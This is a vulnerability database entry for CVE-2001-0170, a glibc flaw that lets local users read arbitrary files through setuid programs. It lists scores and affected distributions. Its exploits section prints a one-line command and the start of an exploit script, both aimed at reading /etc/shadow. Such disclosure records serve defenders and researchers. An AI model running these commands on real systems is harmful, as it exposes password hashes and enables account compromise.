CVE-2001-0170

Published: 26/03/2001 Updated: 10/10/2017
CVSS v2 Base Score: 2.1 | Impact Score: 2.9 | Exploitability Score: 3.9
VMScore: 220
Vector: AV:L/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

glibc 2.1.9x and previous versions do not properly clear the RESOLV_HOST_CONF, HOSTALIASES, or RES_OPTIONS environment variables when executing setuid/setgid programs, which could allow local users to read arbitrary files.

Vulnerable Product

conectiva linux 4.0es

conectiva linux 4.1

conectiva linux 5.1

conectiva linux 6.0

immunix immunix 7.0_beta

conectiva linux 4.0

conectiva linux ecommerce

conectiva linux graficas

conectiva linux 4.2

conectiva linux 5.0

debian debian linux 2.3

redhat linux 7.0

Exploits

setenv RESOLV_HOST_CONF /etc/shadow; ping adfas
# milw0rm.com [1996-01-01] ...

# Charles Stevenson <csteven@newhopeterraplexcom>
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3, Redhat 7.0)
# This exploit is for glibc >= 2.1.9x
# (****krochos@linuxmailorg****)
# Edit this if you have a problem with path
ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
######################## ...